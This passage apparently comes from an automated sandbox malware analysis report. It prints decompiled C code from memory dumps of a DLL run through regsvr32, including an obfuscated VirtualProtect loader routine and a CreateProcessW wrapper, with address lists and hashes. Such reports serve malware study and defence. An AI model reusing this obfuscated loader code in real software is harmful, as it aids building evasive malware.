						_t319 =  *0x6da81264; // 0x0
						_t508 =  *0x6da8126c; // 0x0
						_t321 =  *0x6da8126c; // 0x0
						_t510 =  *0x6da81264; // 0x0
						_t323 =  *0x6da81264; // 0x0
						_t39 =  &(_a8[3]); // 0x1
						asm("sbb eax, eax");
						_v12 =  ~( ~(0x80000000 - _t504 *  *0x6da8125c -  *0x6da81270 +  *0x6da81260 +  *0x6da81260 - _t317 *  *0x6da81260 + _t506 *  *0x6da81260 -  *0x6da81260 + _t319 *  *0x6da8125c -  *0x6da81270 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 - _t508 *  *0x6da8125c -  *0x6da81270 +  *0x6da81260 +  *0x6da81260 - _t321 *  *0x6da81260 + _t510 *  *0x6da81260 -  *0x6da81260 + _t323 *  *0x6da8125c -  *0x6da81270 -  *0x6da81260 +  *0x6da81264 -  *0x6da81260 &  *_t39));
						_t44 = _v24 * 8; // 0xdb4b7154
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t44 + 0x6da83d78 + _v12 * 4));
						_t107 =  *0x6da81264; // 0x0
						_t327 =  *0x6da81268; // 0x0
						_t520 =  *0x6da81264; // 0x0
						_t109 =  *0x6da81268; // 0x0
						_t335 =  *0x6da81264; // 0x0
						_t522 =  *0x6da81268; // 0x0
						_t51 =  &(_a8[3]); // 0x1
						if((_t522 *  *0x6da81268 + _t109 *  *0x6da81268 + _t327 *  *0x6da81268 + 0x04000000 -  *0x6da81260 + _t107 *  *0x6da81264 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 -  *0x6da81260 + _t520 *  *0x6da81264 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 -  *0x6da81260 + _t335 *  *0x6da81264 -  *0x6da81270 -  *0x6da81264 +  *0x6da81270 &  *_t51) != 0) {
							_t420 =  *0x6da81260; // 0x0
							_t606 =  *0x6da81270; // 0x0
							_t201 =  *0x6da81270; // 0x0
							_v20 = _t201 *  *0x6da81264 + _t606 *  *0x6da81264 + _t420 + 0x00000200 -  *0x6da81268 -  *0x6da81270 +  *0x6da81270 +  *0x6da81264 -  *0x6da81268 -  *0x6da81270 +  *0x6da81260 -  *0x6da81268 -  *0x6da81270 +  *0x6da81270 +  *0x6da81264 -  *0x6da81268 -  *0x6da81270 | _v20;
						}
						_t337 =  *0x6da81260; // 0x0
						_t118 =  *0x6da81260; // 0x0
						_t340 =  *0x6da81260; // 0x0
						_t120 =  *0x6da81260; // 0x0
						_t343 =  *0x6da81260; // 0x0
						_t122 =  *0x6da81260; // 0x0
						_t57 =  &(_a8[2]); // 0xb805ebc0
						_t347 =  *0x6da81260; // 0x0
						_t534 =  *0x6da81268; // 0x0
						_t351 =  *0x6da81270; // 0x0
						_t537 =  *0x6da81268; // 0x0
						_t133 =  *0x6da81268; // 0x0
						_t357 =  *0x6da81260; // 0x0
						_t135 =  *0x6da81260; // 0x0
						_t359 =  *0x6da81268; // 0x0
						_t139 =  *0x6da81270; // 0x0
						_t362 =  *0x6da81268; // 0x0
						_t556 =  *0x6da81268; // 0x0
						_t145 =  *0x6da81260; // 0x0
						_t558 =  *0x6da81260; // 0x0
						_t147 =  *0x6da81268; // 0x0
						_t562 =  *0x6da81270; // 0x0
						_t150 =  *0x6da81268; // 0x0
						_t381 =  *0x6da81268; // 0x0
						_t568 =  *0x6da81260; // 0x0
						_t383 =  *0x6da81260; // 0x0
						_t570 =  *0x6da81268; // 0x0
						_t387 =  *0x6da81270; // 0x0
						_t573 =  *0x6da81268; // 0x0
						_t169 =  *0x6da81268; // 0x0
						_t393 =  *0x6da81260; // 0x0
						_t171 =  *0x6da81260; // 0x0
						_t395 =  *0x6da81268; // 0x0
						_t175 =  *0x6da81270; // 0x0
						_t398 =  *0x6da81268; // 0x0
						_t592 =  *0x6da81268; // 0x0
						_t181 =  *0x6da81260; // 0x0
						_t594 =  *0x6da81260; // 0x0
						_t183 =  *0x6da81268; // 0x0
						_t598 =  *0x6da81270; // 0x0
						_t186 =  *0x6da81268; // 0x0
						_t417 =  *0x6da81268; // 0x0
						_t604 =  *0x6da81260; // 0x0
						_t198 = VirtualProtect( *_a8, _t186 *  *0x6da8126c + _t598 *  *0x6da81264 + _t398 *  *0x6da8126c + _t175 *  *0x6da81264 + _t573 *  *0x6da8126c + _t387 *  *0x6da81264 + _t150 *  *0x6da8126c + _t562 *  *0x6da81264 + _t362 *  *0x6da8126c + _t139 *  *0x6da81264 + _t537 *  *0x6da8126c + _t351 *  *0x6da81264 +  *_t57 -  *0x6da81268 -  *0x6da81260 - _t347 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t534 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t133 *  *0x6da81260 -  *0x6da8126c + _t357 *  *0x6da81260 -  *0x6da81268 -  *0x6da81260 - _t135 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t359 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t556 *  *0x6da81260 -  *0x6da8126c + _t145 *  *0x6da81260 -  *0x6da81268 -  *0x6da81260 - _t558 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t147 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t381 *  *0x6da81260 -  *0x6da8126c + _t568 *  *0x6da81260 -  *0x6da81268 -  *0x6da81260 - _t383 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t570 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t169 *  *0x6da81260 -  *0x6da8126c + _t393 *  *0x6da81260 -  *0x6da81268 -  *0x6da81260 - _t171 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t395 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t592 *  *0x6da81260 -  *0x6da8126c + _t181 *  *0x6da81260 -  *0x6da81268 -  *0x6da81260 - _t594 *  *0x6da81270 *  *0x6da81260 *  *0x6da81270 -  *0x6da81260 +  *0x6da8126c - _t183 *  *0x6da8126c *  *0x6da81264 +  *0x6da81270 +  *0x6da8126c +  *0x6da81268 -  *0x6da81260 +  *0x6da81268 -  *0x6da81260 +  *0x6da81264 +  *0x6da8125c -  *0x6da81268 +  *0x6da8126c + _t417 *  *0x6da81260 -  *0x6da8126c + _t604 *  *0x6da81260, _v20,  &_v8 - (_t337 *  *0x6da81264 << 2) - (_t118 << 2) - (_t340 *  *0x6da81264 << 2) - (_t120 << 2) - (_t343 *  *0x6da81264 << 2) - (_t122 << 2)); // executed
						if(_t198 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					_t7 =  &(_a8[1]); // 0x330475c0
					if( *_a8 !=  *_t7) {
						L8:
						return 1;
					}
					if(_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L7:
						_t211 =  *0x6da8126c; // 0x0
						_t212 = _t211 *  *0x6da8126c;
						_t427 =  *0x6da81264; // 0x0
						_t26 = _t212 + 0x4000; // 0x4000
						_t213 =  *0x6da81260; // 0x0
						_t428 =  *0x6da81270; // 0x0
						_t215 =  *0x6da81268; // 0x0
						_t431 =  *0x6da8126c; // 0x0
						_t218 =  *0x6da81260; // 0x0
						_t433 =  *0x6da81270; // 0x0
						_t220 =  *0x6da81268; // 0x0
						_t436 =  *0x6da8126c; // 0x0
						_t223 =  *0x6da81260; // 0x0
						_t438 =  *0x6da81270; // 0x0
						_t225 =  *0x6da81268; // 0x0
						_t441 =  *0x6da8126c; // 0x0
						_t228 =  *0x6da81260; // 0x0
						_t443 =  *0x6da81270; // 0x0
						_t230 =  *0x6da81268; // 0x0
						_t446 =  *0x6da8126c; // 0x0
						_t233 =  *0x6da81260; // 0x0
						_t448 =  *0x6da81270; // 0x0
						_t235 =  *0x6da81268; // 0x0
						_t451 =  *0x6da8126c; // 0x0
						_t238 =  *0x6da81260; // 0x0
						_t453 =  *0x6da81270; // 0x0
						_t240 =  *0x6da81268; // 0x0
						_t28 =  &(_a8[2]); // 0xb805ebc0
						 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))( *_a8,  *_t28, _t427 + _t26 -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t213 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t428 *  *0x6da8125c *  *0x6da81260 - _t215 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268 +  *0x6da81264 + _t431 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t218 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t433 *  *0x6da8125c *  *0x6da81260 - _t220 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268 +  *0x6da81264 + _t436 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t223 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t438 *  *0x6da8125c *  *0x6da81260 - _t225 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268 +  *0x6da81264 + _t441 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t228 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t443 *  *0x6da8125c *  *0x6da81260 - _t230 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268 +  *0x6da81264 + _t446 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t233 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t448 *  *0x6da8125c *  *0x6da81260 - _t235 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268 +  *0x6da81264 + _t451 *  *0x6da8126c -  *0x6da81264 -  *0x6da81270 -  *0x6da81264 - _t238 *  *0x6da81268 +  *0x6da81264 -  *0x6da8126c -  *0x6da81268 - _t453 *  *0x6da8125c *  *0x6da81260 - _t240 *  *0x6da81270 *  *0x6da8126c +  *0x6da81268,  *((intOrPtr*)(_a4 + 0x34))); // executed
						goto L8;
					} else {
						_t16 =  &(_a8[2]); // 0xb805ebc0
						_t249 =  *0x6da81270; // 0x0
						_t461 =  *0x6da81264; // 0x0
						_t708 =  *0x6da81270; // 0x0
						_t251 =  *0x6da81268; // 0x0
						_t710 =  *0x6da81270; // 0x0
						_t255 =  *0x6da81264; // 0x0
						_t482 =  *0x6da81270; // 0x0
						_t712 =  *0x6da81268; // 0x0
						_t484 =  *0x6da81270; // 0x0
						_t716 =  *0x6da81264; // 0x0
						_t276 =  *0x6da81270; // 0x0
						_t486 =  *0x6da81268; // 0x0
						_t278 =  *0x6da81270; // 0x0
						_t490 =  *0x6da81264; // 0x0
						_t737 =  *0x6da81270; // 0x0
						_t280 =  *0x6da81268; // 0x0
						if(_t490 *  *0x6da81264 + _t716 *  *0x6da81264 + _t255 *  *0x6da81264 + _t461 *  *0x6da81264 +  *_t16 %  *(_a4 + 0x3c) +  *0x6da81270 -  *0x6da81260 - _t249 *  *0x6da81264 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 +  *0x6da81268 -  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81268 +  *0x6da8126c +  *0x6da81260 -  *0x6da81270 - _t708 *  *0x6da8126c -  *0x6da81270 - _t251 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 +  *0x6da81264 +  *0x6da81270 -  *0x6da81260 - _t710 *  *0x6da81264 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 +  *0x6da81268 -  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81268 +  *0x6da8126c +  *0x6da81260 -  *0x6da81270 - _t482 *  *0x6da8126c -  *0x6da81270 - _t712 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 +  *0x6da81264 +  *0x6da81270 -  *0x6da81260 - _t484 *  *0x6da81264 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 +  *0x6da81268 -  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81268 +  *0x6da8126c +  *0x6da81260 -  *0x6da81270 - _t276 *  *0x6da8126c -  *0x6da81270 - _t486 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 +  *0x6da81264 +  *0x6da81270 -  *0x6da81260 - _t278 *  *0x6da81264 -  *0x6da81270 +  *0x6da81264 +  *0x6da81264 +  *0x6da81268 -  *0x6da8126c -  *0x6da81268 -  *0x6da81260 +  *0x6da81268 +  *0x6da8126c +  *0x6da81260 -  *0x6da81270 - _t737 *  *0x6da8126c -  *0x6da81270 - _t280 *  *0x6da81268 *  *0x6da8126c *  *0x6da81264 +  *0x6da81264 != 0) {
							goto L8;
						}
						goto L7;
					}
				}
				return 1;
			}

0x6da33d7d
0x6da33dac
0x6da33dd9
0x6da33e05
0x6da33e32
0x6da33e43
0x6da33e46
0x6da34428
0x6da3442d
0x6da34431
0x6da34434
0x6da3446b
0x6da34470
0x6da34474
0x6da34477
0x6da3449d
0x6da344ac
0x6da344c1
0x6da344e8
0x6da34509
0x6da34518
0x6da3452d
0x6da34557
0x6da3455c
0x6da34560
0x6da3456c
0x6da34579
0x6da34587
0x6da345a1
0x6da345bc
0x6da345d7
0x6da345f1
0x6da3460c
0x6da34624
0x6da34627
0x6da34629
0x6da34641
0x6da3467a
0x6da346a3
0x6da346a3
0x6da346a6
0x6da346bb
0x6da346c5
0x6da346d7
0x6da346e1
0x6da346f3
0x6da34705
0x6da34714
0x6da3473d
0x6da34759
0x6da3477a
0x6da347ad
0x6da347c1
0x6da347dc
0x6da34804
0x6da34820
0x6da34840
0x6da34873
0x6da34888
0x6da348a2
0x6da348cb
0x6da348e6
0x6da34907
0x6da34939
0x6da3494e
0x6da34969
0x6da34992
0x6da349ae
0x6da349cf
0x6da34a02
0x6da34a16
0x6da34a31
0x6da34a59
0x6da34a75
0x6da34a95
0x6da34ac8
0x6da34add
0x6da34af7
0x6da34b20
0x6da34b3b
0x6da34b5c
0x6da34b8e
0x6da34ba3
0x6da34bb9
0x6da34bc1
0x00000000
0x6da34bc3
0x00000000
0x6da34bc3
0x6da34bc1
0x6da33e54
0x6da33e57
0x6da34410
0x00000000
0x6da34410
0x6da33e64
0x6da3411c
0x6da34123
0x6da34128
0x6da3412f
0x6da34135
0x6da3414e
0x6da3416e
0x6da34184
0x6da341a5
0x6da341c6
0x6da341e6
0x6da341fc
0x6da3421d
0x6da3423e
0x6da3425e
0x6da34274
0x6da34295
0x6da342b6
0x6da342d6
0x6da342ec
0x6da3430d
0x6da3432e
0x6da3434e
0x6da34364
0x6da34385
0x6da343a6
0x6da343c6
0x6da343dc
0x6da343fb
0x6da3440b
0x00000000
0x6da33e7e
0x6da33e84
0x6da33e98
0x6da33edc
0x6da33ef7
0x6da33f0c
0x6da33f3a
0x6da33f7f
0x6da33f99
0x6da33fae
0x6da33fdd
0x6da34022
0x6da3403d
0x6da34051
0x6da34080
0x6da340c4
0x6da340df
0x6da340f4
0x6da34116
0x00000000
0x00000000
0x00000000
0x6da34116
0x6da33e64
0x00000000

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7860d3853140cdca1940b4c49de88e61aa7f48b8982fa396f5766ddf455e117b
Instruction ID: b201a151541f79ab4eff449690753fd7d5ff06eefc6cb6e52d2cc34b3c66ee92
Opcode Fuzzy Hash: 7860d3853140cdca1940b4c49de88e61aa7f48b8982fa396f5766ddf455e117b
Instruction Fuzzy Hash: 12829F7650D3018FCF08DF28CAD5B75FBB5F7A7356B85C6288821CA298E7306416CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 6DA496CE Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E6DA496CE(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				void* _t75;

				_t75 = __eflags;
				_push(0xc);
				E6DA5C840(E6DA6E66A, __ebx, __edi, __esi);
				_t72 = __ecx;
				 *((intOrPtr*)(_t73 - 0x14)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x6da73508;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				_t57 = __ecx + 0x34;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				E6DA212E0(__ecx + 0x34);
				 *((intOrPtr*)(_t72 + 0x40)) = 0;
				 *((intOrPtr*)(_t72 + 0x44)) = 0;
				 *(_t72 + 0x50) =  *(_t72 + 0x50) | 0xffffffff;
				 *((intOrPtr*)(_t73 - 4)) = 0;
				 *((intOrPtr*)(_t72 + 0x54)) = 0;
				 *((intOrPtr*)(_t72 + 0x68)) = 0;
				 *((intOrPtr*)(_t72 + 0x6c)) = 0;
				 *((intOrPtr*)(_t72 + 0x28)) = 0x20;
				 *((intOrPtr*)(_t72 + 0x20)) = 0x14;
				 *((intOrPtr*)(_t72 + 0x18)) = 0;
				 *((char*)(_t72 + 0x14)) =  *((intOrPtr*)(_t73 + 8));
				 *((char*)(_t73 - 4)) = 2;
				E6DA21690(_t57, _t75, 0x1000); // executed
				 *((intOrPtr*)(_t73 - 4)) = 1;
				 *((intOrPtr*)(_t72 + 0x30)) = 1;
				 *((intOrPtr*)(_t72 + 0x44)) = 0x18;
				 *((intOrPtr*)(_t72 + 0x78)) = E6DA3D6AF(_t75, 0xc);
				 *_t74 = 0x188;
				_t63 = E6DA4A03B();
				 *((intOrPtr*)(_t73 + 8)) = _t63;
				 *((char*)(_t73 - 4)) = 4;
				_t76 = _t63;
				if(_t63 == 0) {
					_t49 = 0;
					__eflags = 0;
				} else {
					_t49 = E6DA493C0(1, _t63, 0, _t72, _t76);
				}
				 *((char*)(_t73 - 4)) = 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)))) = _t49;
				_t65 = E6DA4A03B(0x64);
				 *((intOrPtr*)(_t73 + 8)) = _t65;
				 *((char*)(_t73 - 4)) = 5;
				_t77 = _t65;
				if(_t65 == 0) {
					_t51 = 0;
					__eflags = 0;
				} else {
					_t51 = E6DA495E4(1, _t65, 0, _t72, _t77);
				}
				 *((char*)(_t73 - 4)) = 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 4)) = _t51;
				_t67 = E6DA4A03B(0x14);
				 *((intOrPtr*)(_t73 + 8)) = _t67;
				 *((char*)(_t73 - 4)) = 6;
				_t78 = _t67;
				if(_t67 == 0) {
					_t53 = 0;
					__eflags = 0;
				} else {
					_t53 = E6DA49667(1, _t67, 0, _t72, _t78);
				}
				 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x78)) + 8)) = _t53;
				 *((intOrPtr*)(_t72 + 0x7c)) = 1;
				 *((intOrPtr*)(_t72 + 0x80)) = 0;
				 *((intOrPtr*)(_t72 + 0x84)) = 0;
				 *((intOrPtr*)(_t72 + 0x88)) = 0;
				return E6DA5C8E5(_t72);
			}

0x6da496ce
0x6da496ce
0x6da496d5
0x6da496da
0x6da496dc
0x6da496df
0x6da496e7
0x6da496ea
0x6da496ed
0x6da496f2
0x6da496f5
0x6da496f8
0x6da496fd
0x6da49700
0x6da49703
0x6da49707
0x6da4970a
0x6da4970d
0x6da49710
0x6da4971d
0x6da49724
0x6da4972b
0x6da4972e
0x6da49731
0x6da49735
0x6da4973d
0x6da49765
0x6da49768
0x6da49774
0x6da49777
0x6da49783
0x6da49785
0x6da49788
0x6da4978c
0x6da4978e
0x6da49797
0x6da49797
0x6da49790
0x6da49790
0x6da49790
0x6da4979e
0x6da497a1
0x6da497a8
0x6da497aa
0x6da497ad
0x6da497b1
0x6da497b3
0x6da497bc
0x6da497bc
0x6da497b5
0x6da497b5
0x6da497b5
0x6da497c3
0x6da497c6
0x6da497ce
0x6da497d0
0x6da497d3
0x6da497d7
0x6da497d9
0x6da497e2
0x6da497e2
0x6da497db
0x6da497db
0x6da497db
0x6da497e7
0x6da497ea
0x6da497ed
0x6da497f3
0x6da497f9
0x6da49806

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA496D5

Part of subcall function 6DA3D6AF: _malloc.LIBCMT ref: 6DA3D6CD

Part of subcall function 6DA4A03B: LocalAlloc.KERNEL32(00000040,00000000,?,6DA4A437,00000010,?,?,00000000,?,00000004,6DA4985D,6DA3ED9D,6DA45AFA,?,6DA22C88,00000000), ref: 6DA4A045

Part of subcall function 6DA493C0: __EH_prolog3.LIBCMT ref: 6DA493C7

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: f1b568443e553636ffdf9141cb47b10952c1b47db3754192ac7019ca1bcda043
Instruction ID: 758162ef0c8eba65c1513450c66ca9ce5c796c01e6622f47ace22ada1503331a
Opcode Fuzzy Hash: f1b568443e553636ffdf9141cb47b10952c1b47db3754192ac7019ca1bcda043
Instruction Fuzzy Hash: E0312CB0909B40CEDB61CF69828065AFFE5BF95308F24C95EC29A87790C7B1A685CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100146E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E100146E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10009E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E1001BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x100146e8
0x100146ed
0x100146ef
0x100146f2
0x100146f5
0x100146f8
0x100146f9
0x100146fc
0x100146ff
0x10014702
0x10014703
0x10014706
0x10014709
0x1001470c
0x1001470d
0x10014710
0x10014713
0x10014716
0x10014717
0x10014719
0x1001471e
0x10014727
0x1001472e
0x10014732
0x10014739
0x10014740
0x10014747
0x1001474e
0x10014755
0x1001475c
0x10014763
0x1001476a
0x10014771
0x1001477d
0x10014783
0x10014786
0x1001478d
0x100147ae
0x100147ca
0x100147d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 100147CA

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: bcf8ef1c5a943e26b57c193b06fd13cf537ea9bceb521d738b9e4d3f43ab073a
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: EF31E272900248BBDF559F95CD09CDEBF76FB89314F008188FA2466160D7B69A60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA219C0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E6DA219C0(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _t40;
				void* _t44;

				_v24 = __ecx;
				_v20 = E6DA21490(_v24);
				_v12 =  *((intOrPtr*)(_v20 + 4));
				_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v20)) + 0x10))))();
				_t40 =  *((intOrPtr*)( *((intOrPtr*)( *_v28))))(_a4, 1); // executed
				_v16 = _t40;
				if(_v16 == 0) {
					E6DA219B0();
				}
				if(_v12 >= _a4) {
					_v32 = _a4;
				} else {
					_v32 = _v12;
				}
				_v8 = _v32 + 1;
				_t44 = E6DA21750(_v20);
				E6DA21920(E6DA21750(_v16), _v8, _t44, _v8);
				 *((intOrPtr*)(_v16 + 4)) = _v12;
				E6DA21430(_v20);
				return E6DA21730(_v24, _v16);
			}

0x6da219c6
0x6da219d1
0x6da219da
0x6da219ee
0x6da21a01
0x6da21a03
0x6da21a0a
0x6da21a0c
0x6da21a0c
0x6da21a17
0x6da21a24
0x6da21a19
0x6da21a1c
0x6da21a1c
0x6da21a2d
0x6da21a37
0x6da21a4a
0x6da21a58
0x6da21a5e
0x6da21a72

APIs

__mbstowcs_l.LIBCMTD ref: 6DA21A4A

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: __mbstowcs_l
String ID:
API String ID: 106630405-0
Opcode ID: 746cf2251e56d2d4648672c393f6e2f1e1e06d9032b4532ec0f864e48e0de62d
